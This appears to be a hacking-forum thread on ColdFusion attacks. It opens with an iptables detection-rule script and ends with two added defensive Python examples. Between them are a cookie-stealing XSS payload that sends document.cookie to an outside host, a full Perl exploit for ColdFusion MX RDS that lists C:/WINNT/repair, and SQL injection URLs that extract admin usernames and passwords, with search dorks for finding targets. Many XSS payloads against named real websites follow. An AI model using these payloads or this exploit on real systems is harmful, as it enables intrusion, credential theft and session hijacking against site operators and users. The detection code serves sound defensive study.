LogAs="SID926" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETODBCINI()"' $Tail # '"WEB-COLDFUSION set odbc ini attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:926
LogAs="SID927" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_SETTINGS_REFRESH()"' $Tail # '"WEB-COLDFUSION settings refresh attempt"' nocase-ignored bugtraq,550 classtype:web-application-attack sid:927
LogAs="SID928" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/exampleapp/"' $Tail # '"WEB-COLDFUSION exampleapp access"' nocase-ignored classtype:attempted-recon sid:928
LogAs="SID929" $Ipt -A $Me -p tcp --dport 80 -m string --string '"CFUSION_VERIFYMAIL()"' $Tail # '"WEB-COLDFUSION CFUSION_VERIFYMAIL access"' nocase-ignored bugtraq,550 classtype:attempted-user sid:929
LogAs="SID930" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/"' $Tail # '"WEB-COLDFUSION snippets attempt"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:930
LogAs="SID931" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/cfmlsyntaxcheck.cfm"' $Tail # '"WEB-COLDFUSION cfmlsyntaxcheck.cfm access"' nocase-ignored bugtraq,550 classtype:attempted-recon sid:931
LogAs="SID932" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/application.cfm"' $Tail # '"WEB-COLDFUSION application.cfm access"' nocase-ignored bugtraq,550 arachnids,268 cve,CAN-2000-0189 classtype:attempted-recon sid:932
LogAs="SID933" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/onrequestend.cfm"' $Tail # '"WEB-COLDFUSION onrequestend.cfm access"' nocase-ignored bugtraq,550 arachnids,269 cve,CAN-2000-0189 classtype:attempted-recon sid:933
LogAs="SID935" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfide/administrator/startstop.html"' $Tail # '"WEB-COLDFUSION startstop DOS access"' nocase-ignored bugtraq,247 classtype:web-application-attack sid:935
LogAs="SID936" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/cfdocs/snippets/gettempdirectory.cfm"' $Tail # '"WEB-COLDFUSION gettempdirectory.cfm access "' nocase-ignored bugtraq,550 classtype:attempted-recon sid:936
LogAs="SID1659" $Ipt -A $Me -p tcp --dport 80 -m string --string '"/sendmail.cfm"' $Tail # '"WEB-COLDFUSION sendmail.cfm access"' nocase-ignored classtype:attempted-recon sid:1659
LogAs="SID1540" $Ipt -A $Me -p tcp --dport 80 -m string --string '"Mode=debug"' $Tail # '"WEB-COLDFUSION ?Mode=debug attempt"' nocase-ignored classtype:web-application-activity sid:1540
;;
destroy)
echo "Stopping $Me" >&2
DestroyChain $Me
;;
renamechain)
TempChain="$Me-$RANDOM"
echo "Replacing existing rules in $Me with new rules" >&2
$IptablesBin -E $Me $TempChain
;;
replacelinks)
if [ -z "$TempChain" ]; then
echo "No temporary chain to relink in $Me replacelinks, replace operation incomplete." >&2
elif ! $IptablesBin -L $Me -n >/dev/null 2>&1 ; then
echo "No $Me chain in $Me, replace operation incomplete." >&2
elif ! $IptablesBin -L $TempChain -n >/dev/null 2>&1 ; then
echo "No $TempChain chain in $Me, replace operation incomplete." >&2
elif [ "`$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
echo "Too few/many references to $TempChain in INPUT in $Me replacelinks, replace operation incomplete." >&2
elif [ "`$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
echo "Too few/many references to $TempChain in FORWARD in $Me replacelinks, replace operation incomplete." >&2
elif [ "`$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | wc -l`" -ne 1 ]; then
echo "Too few/many references to $TempChain in OUTPUT in $Me replacelinks, replace operation incomplete." >&2
else
#ZZZZ Place the same criteria you used in link/unlink above in the following three lines.
#ZZZZ Criteria should go just in front of "-j $Me"
$IptablesBin -R INPUT `$IptablesBin -L INPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -i \! lo -j $Me
$IptablesBin -R FORWARD `$IptablesBin -L FORWARD -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me
$IptablesBin -R OUTPUT `$IptablesBin -L OUTPUT -n --line-numbers | grep $TempChain | awk '{print $1}'` -j $Me
DestroyChain $TempChain
unset TempChain
fi
;;
status)
if $IptablesBin -L $Me -n >/dev/null 2>&1 ; then
echo "$Me created" >&2
else
echo "$Me destroyed" >&2
fi
;;
version)
echo "$Me $MyVersion, firebrickslib $FBLibVer" >&2
;;
help)
DefaultHelp
#ZZZZ Please change the text to appropriate help text for this module. You should
#ZZZZ cover what the module does, if it's generally safe to use, and under what
#ZZZZ conditions it should not be used. Please replace the lines between the two
#ZZZZ EOTEXT lines with your own.
cat <<EOTEXT >&2
The $Me module puts in some blocks for fragmented icmp packets
(illegal) and address mask and timestamp requests and replies. At best,
these are uncommon and are used in network mapping. These rules should
be safe to use on any network.
EOTEXT
;;
*)
echo "Unknown action $Action in $Me, no action taken." >&2
;;
esac
done
27.05.2008, 15:20
XSS in ColdFusion 5.0
The ColdFusion administrator can view the application log through a web browser. The vulnerability lets an attacker write arbitrary JavaScript code into the application log, which is executed when the administrator views the log. Here is part of the vulnerable code:
<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
SELECT * FROM Products
Where ProductId = #int(url.productid)#
</CFQUERY>
If the INT function encounters a non-numeric value, it raises an error and writes the value to the application log. If url.productid contains something like this:
<iframe name="frame1" width="0" height="0"></iframe> <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=" + document.cookie</script>
then, when the application log is viewed, the attacker can steal the administrator's cookies, which hold the password in encrypted form.
Buffer overflow in Macromedia ColdFusion jrun.dll leading to a DoS of IIS
A buffer overflow was found in ColdFusion MX server when it is used together with Microsoft IIS. On receiving an HTTP header longer than 4096 bytes, and if the template filename is longer than 8092 bytes, an overflow occurs in the 'jrun.dll' module. Successful exploitation of the bug can lead to IIS hanging and possibly to execution of arbitrary code.
ColdFusion MX Remote Development Service Exploit
Code:
#!/usr/bin/perl
# RDS_c_Dump.pl
# By angry packet
##
# THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY
#
# ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is an "almost" complete emulation of a dreamweaver client connection,
# in like one full HTTP1/1 session within netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Due to certain current situations I am not allowed to release full exploit code with
# ( READ, RETRIEVE, WRITE ) functions.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,
# 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,
# 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,
# 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------
use strict;
use IO::Socket;
use vars qw($response @clength @rarray);
## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28
#3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47
#4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32
#6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50
#7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51
#9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37
# Static Content-Length: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
@clength = ( "Content-Length: 46",
"Content-Length: 28",
"Content-Length: 47",
"Content-Length: 46",
#"Content-Length: 32",
#"Content-Length: 50",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 24",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 29",
"Content-Length: 46",
"Content-Length: 37"
);
@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:7:C:/_mm/STR:1:*STR:0:",
"3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
#"3:STR:10:C:/_notes/STR:1:*STR:0:",
#"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:3:C:/STR:1:*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);
system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++ ) {
for ( $c = 0; $c < @clength; $c++ ) {
if( $i == $c ) {
&gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
}
}
}
sub gen_sock() {
my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
PeerPort => $PORT,
Proto => 'tcp',
);
die "Socket Could not be established ! $!" unless $sock;
print "Target: $TARGET:$PORT\n";
print "$POST\n";
print "Request String Value: $rarray[$i]\n";
print "$clength[$c]\n";
print "Please wait.. ..\n";
print $sock "$POST";
print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
print $sock "Host: $TARGET\r\n";
print $sock "$clength[$c]\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "Cache-Control: no-cache\r\n";
print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
print $sock "\r\n";
print $sock "$rarray[$i]";
# lets return and print data to term
while($response = <$sock>) {
chomp($response);
print "$response\n";
}
close($sock);
}
# milw0rm.com [2003-07-07]
Last edited by Ded MustD!e on 27.05.2008 at 16:23.
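What the traffic from the script above looks like from the server side is worth spelling out for whoever reviews IIS logs: every RDS call goes to /CFIDE/main/ide.cfm with CFSRV=IDE in the query string, carries the fixed Dreamweaver-RDS-SCM1.00 User-Agent, and sends a body in the length-prefixed format the comments document (an item count, then STR:<length>:<value> items). The Python below is an added example, not part of the post or of the milw0rm script: it scans constructed W3C-style log lines for RDS requests from hosts outside an assumed developer allowlist (TRUSTED_DEV_NETS is a hypothetical value) and decodes the request-string format so an analyst can read back which path a client asked RDS to browse. The log lines and the field layout are constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: a W3C-style IIS log subset with the fields named in the #Fields line.
# 203.0.113.x is documentation address space; 192.168.0.12 stands in for a developer host.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-07-01 10:30:43 203.0.113.7 POST /CFIDE/main/ide.cfm CFSRV=IDE&ACTION=BrowseDir_Studio 200 Dreamweaver-RDS-SCM1.00
2003-07-01 10:30:44 203.0.113.7 GET /News/ReadNews.cfm mode=debug 200 Mozilla/4.0
2003-07-01 10:31:02 192.168.0.12 POST /CFIDE/main/ide.cfm CFSRV=IDE&ACTION=BrowseDir_Studio 200 Dreamweaver-RDS-SCM1.00
2003-07-01 10:31:10 203.0.113.9 GET /index.cfm fuseaction=home 200 Mozilla/4.0
"""

# Hypothetical allowlist: only these address prefixes are expected to use RDS at all.
TRUSTED_DEV_NETS = ("192.168.0.",)

RDS_PATH = "/cfide/main/ide.cfm"
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3}) (.*)$")


def find_rds_requests(log_text, trusted_prefixes=TRUSTED_DEV_NETS):
    """Return one record per RDS request (CFSRV=IDE against ide.cfm) found in the log."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue                      # blank lines and W3C directives
        match = LOG_LINE.match(line)
        if not match:
            continue                      # not our field layout; skip rather than guess
        _date, _time, ip, method, stem, query, status, agent = match.groups()
        if stem.lower() != RDS_PATH:
            continue
        params = {k.lower(): v[0] for k, v in parse_qs(query).items()}
        if params.get("cfsrv", "").upper() != "IDE":
            continue
        hits.append({
            "ip": ip,
            "method": method,
            "action": params.get("action", ""),
            "status": int(status),
            "agent": agent,
            "trusted": ip.startswith(trusted_prefixes),
        })
    return hits


def parse_rds_string(payload):
    """Decode an RDS request body: '<count>:' followed by count items of 'STR:<len>:<value>'.

    Values are length-prefixed, so the ':' inside a Windows drive path is not a delimiter.
    Raises ValueError on anything that does not fit the layout.
    """
    count_text, sep, rest = payload.partition(":")
    if not sep or not count_text.isdigit():
        raise ValueError("missing item count")
    items = []
    pos = 0
    for _ in range(int(count_text)):
        if rest[pos:pos + 4] != "STR:":
            raise ValueError(f"expected 'STR:' at offset {pos}")
        pos += 4
        end = rest.find(":", pos)
        if end < 0 or not rest[pos:end].isdigit():
            raise ValueError(f"bad length field at offset {pos}")
        length = int(rest[pos:end])
        pos = end + 1
        if pos + length > len(rest):
            raise ValueError("declared length runs past the end of the payload")
        items.append(rest[pos:pos + length])
        pos += length
    if pos != len(rest):
        raise ValueError("trailing data after the last item")
    return items


def browsed_paths(bodies):
    """The first item of each decoded body is the path the client asked RDS to browse."""
    return [parse_rds_string(body)[0] for body in bodies]


if __name__ == "__main__":
    for hit in find_rds_requests(SAMPLE_LOG):
        verdict = "expected" if hit["trusted"] else "ALERT: RDS from untrusted host"
        print(f"{hit['ip']:15} {hit['action']:20} {hit['agent']:25} {verdict}")
    print(parse_rds_string("3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"))
```

The parser is strict on purpose: two of the request strings listed in the script's comments (#16 and #18) do not fit the length-prefixed layout and raise ValueError instead of yielding a guessed path, which is the right outcome when reading attacker-supplied bodies back out of a capture.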
27.05.2008, 16:28
CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability
admin_username:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s))
admin_password:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers))
admin:
http://www.site.com/[script path]/cw2/admin/
dork:
allinurl: Details.cfm?ProdID=
allinurl: Results.cfm?category=
QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability
admin password:
http://www.site.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1
link admin:
http://www.site.com/admin/
XSS in Savvy Content Manager
The vulnerability exists because input passed in the "searchterms" parameter of the searchresults.cfm, search_results.cfm and search_results/index.cfm scripts is not properly sanitised.
Example:
http://www.ulsf.org/cgi-bin/searchresults.cfm?search=Search&searchterm="><scri pt>alert('Antichat')</script>
XSS in Tradingeye Shop
The vulnerability exists because input passed in the "image" parameter of the details.cfm script is not properly sanitised.
Example:
http://www.azumahallpro.com/site/details.cfm?image="><script>alert('Antichat')</script>
XSS in iPostMX 2005
The vulnerability exists because input passed in the "RETURNURL" parameter of the userlogin.cfm and account.cfm scripts is not properly sanitised.
Example:
http://www.scenta.co.uk/home/userlogin.cfm?returnUrl="><script>alert('Antichat' )</script>
XSS in Goss iCM
The vulnerability exists because input passed in the "keyword" parameter of the index.cfm script is not properly sanitised.
Example:
http://www.simtropolis.com/stex/index.cfm?Keyword="><script>alert('Antichat')</script>
SQL injection in 1WebCalendar
The vulnerability exists because input passed in the "EventID" parameter of the "viewEvent.cfm" script, the "NewsID" parameter of the "news/newsView.cfm" script and the "ThisDate" parameter of the "mainCal.cfm" script is not properly sanitised.
Example:
http://events.lapl.org/viewEvent.cfm?eventID=-1+union+select+1,2,3,4,5,6,unhex(hex(concat_ws(0x3 a,lapl_email,lapl_email_password,network_loginID,n etwork_password,win_loginID,win_password,LoginID,M ainPassword))),8,9,10,11,12,131,4,15,16,17,18,9,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7+from+user_access+limit+0,1/*
XSS in CommonSpot
The vulnerability exists because input passed in the "bNewWindow" parameter of the "loader.cfm" script is not properly sanitised.
Example:
http://author.heritage.org/About/Departments/loader.cfm?url=/commonspot/security/login.cfm&bNewWindow="><script>alert('Antichat')</script>
XSS in e-publish
The vulnerability exists because input passed in the "obcatid" and "comid" parameters of the "show.cfm" script is not properly sanitised.
Example:
http://www.paratiritisnews.gr/show_archive.cfm?id=200&obcatid=4"><IMG SRC="javascript:alert('Antichat');">
Note: more than once I have run into the case where, after we insert <script>alert()</script>, the opening tag in the page source is replaced with <InvalidTag>. It is bypassed very simply; see the example above.
XSS in Honeycomb Archive
Cross-site scripting is possible because input passed in the "keyword" parameter of the "search.cfm" script is not properly sanitised.
Example:
http://www.scu.edu/siteindex/search.cfm?keyword="><IMG SRC="javascript:alert('Antichat');">
XSS in Hot Banana Web Content Management Suite
The vulnerability exists because input passed in the "keywords" parameter of the "index.cfm" script is not properly sanitised.
Example:
http://www.robertmorris.edu/search/index.cfm?keywords="><IMG SRC="javascript:alert('Antichat');">
XSS in CF_Nuke
Cross-site scripting is possible because input passed in the "cat", "topic" and "newsid" parameters is not properly sanitised.
Example:
http://www.nora.org/index.cfm?sector=news&page=read&newsid="><IMG SRC="javascript:alert('Antichat');">
SQL injection in Magic Forum Personal
The vulnerability exists in the handling of input passed in the "ForumID", "Thread" and "ThreadID" parameters of the "view_forum.cfm" script.
Example:
http://www.fecca.org.au/forum/view_forum.cfm?ForumID=1+or+1=(SELECT+TOP+1+cast(L ogin+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nv archar)+from+ForumUsers)--
XSS in Simple Message Board
The vulnerability exists because input passed to the 'forum.cfm', 'user.cfm', 'thread.cfm' and 'search.cfm' scripts is not properly sanitised.
Example:
http://www.hungrymonster.com/messageboard/thread.cfm?TID="><IMG SRC="javascript:alert('Antichat');">
XSS in Quick Cart
The vulnerability exists because input passed in the 'search' parameter of the 'search.cfm' script is not properly sanitised.
Example:
http://www.guardianhomeexchange.com/ihea/search.cfm?search="><IMG SRC="javascript:alert('Antichat');">
XSS in FuseTalk
The vulnerability exists because input passed in the 'ProfileID' parameter of the 'tombstone.cfm' module is not properly sanitised.
Example:
http://www.wilmott.com/tombstone.cfm?ProfileID="><IMG SRC="javascript:alert('Antichat');">
Last edited by Ded MustD!e on 27.05.2008 at 22:13.
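The note in the post above (the opening <script> tag being rewritten to <InvalidTag> while the IMG variant goes through untouched) is the classic failure of a tag-name blacklist, and it is worth seeing from the defender's side. The Python below is an added example, not code from the post or from any of the products listed: it models that blacklist next to proper output encoding, renders a hypothetical search template with each, and then parses the result the way a browser would, reporting which start tags appeared and what the echoed attribute value ended up as. The inputs are constructed stand-ins for the payloads quoted above; render_search_page and TEMPLATE_TAGS are assumptions for the demonstration, not anything taken from the listed applications.

```python
import html
import re
from html.parser import HTMLParser

# Constructed inputs modelled on the payload shapes reported above (not the live URLs).
SCRIPT_INPUT = '"><script>alert(1)</script>'
IMG_INPUT = '"><IMG SRC="javascript:alert(1);">'

# Start tags the hypothetical template emits on its own; anything else came from the input.
TEMPLATE_TAGS = ("input", "p")


def blacklist_filter(value):
    """The behaviour the note describes: only an opening <script tag is renamed to <InvalidTag.

    Everything else, including the quote that closes the surrounding attribute, passes through.
    """
    return re.sub(r"<script", "<InvalidTag", value, flags=re.IGNORECASE)


def encode_for_html(value):
    """Output encoding for HTML text and attribute contexts: <, >, &, \" and ' become entities."""
    return html.escape(value, quote=True)


def render_search_page(term, sanitizer):
    """Hypothetical search template that echoes the term inside an attribute and as page text."""
    safe = sanitizer(term)
    return f'<input name="keyword" value="{safe}"><p>Results for {safe}</p>'


class _TagCollector(HTMLParser):
    """Records every start tag and the value attribute of the first <input>, as a browser would parse it."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.keyword_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and self.keyword_value is None:
            self.keyword_value = dict(attrs).get("value")


def inspect(rendered):
    """Which start tags did the input add, and did the echoed term survive as a plain attribute value?"""
    collector = _TagCollector()
    collector.feed(rendered)
    return {
        "injected": [t for t in collector.tags if t not in TEMPLATE_TAGS],
        "keyword_value": collector.keyword_value,
    }


if __name__ == "__main__":
    for label, sanitizer in (("blacklist", blacklist_filter), ("encode", encode_for_html)):
        for payload in (SCRIPT_INPUT, IMG_INPUT):
            print(label, inspect(render_search_page(payload, sanitizer)))
```

With the blacklist, the script payload is renamed but the leading quote still terminates the attribute (the parsed value comes back empty and an unknown tag appears in the page), and the IMG payload is not touched at all. With encoding, both payloads come back as the literal search term and no extra tag is ever created. In CFML the equivalent of encode_for_html is EncodeForHTML() on ColdFusion 10 and later, or HTMLEditFormat() on the older releases these products ran on; the point is that the encoding is applied at output, per context, rather than by renaming one tag name in the input.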